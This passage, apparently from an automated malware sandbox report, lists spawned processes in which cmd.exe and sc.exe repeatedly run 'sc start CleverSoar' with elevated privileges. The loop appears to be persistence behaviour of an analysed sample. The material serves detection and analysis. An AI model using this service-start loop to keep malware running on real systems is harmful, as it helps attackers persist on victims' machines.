                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:20
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:21
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:22
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:23
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:24
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:25
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:26
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:27
                              Start time:23:06:13
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:28
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:29
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:30
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:31
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:32
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:33
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:34
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:35
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:36
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:37
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:38
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                              Imagebase:0x7ff693ab0000
                              File size:496'640 bytes
                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                              Has elevated privileges:true
                              Has administrator privileges:false
                              Programmed in:C, C++ or other language
                              Has exited:false

                              Target ID:39
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:40
                              Start time:23:06:14
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:41
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:42
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:43
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:44
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:45
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:46
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:47
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:48
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:49
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:50
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:51
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:52
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:53
                              Start time:23:06:15
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:54
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:55
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:56
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:57
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:58
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:59
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:60
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:61
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:62
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:63
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:64
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:65
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:66
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:67
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:68
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:69
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:70
                              Start time:23:06:16
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:71
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:72
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:73
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:74
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:75
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:76
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:77
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:78
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:79
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:80
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:81
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:82
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:83
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:84
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:85
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:86
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:87
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\sc.exe
                              Wow64 process (32bit):false
                              Commandline:sc start CleverSoar
                              Imagebase:0x7ff616510000
                              File size:72'192 bytes
                              MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:88
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\conhost.exe
                              Wow64 process (32bit):false
                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Imagebase:0x7ff7699e0000
                              File size:862'208 bytes
                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Has exited:true

                              Target ID:89
                              Start time:23:06:17
                              Start date:22/12/2024
                              Path:C:\Windows\System32\cmd.exe
                              Wow64 process (32bit):false
                              Commandline:cmd /c start sc start CleverSoar
                              Imagebase:0x7ff69b1c0000
                              File size:289'792 bytes
                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                              Has elevated privileges:true
                              Has administrator privileges:true
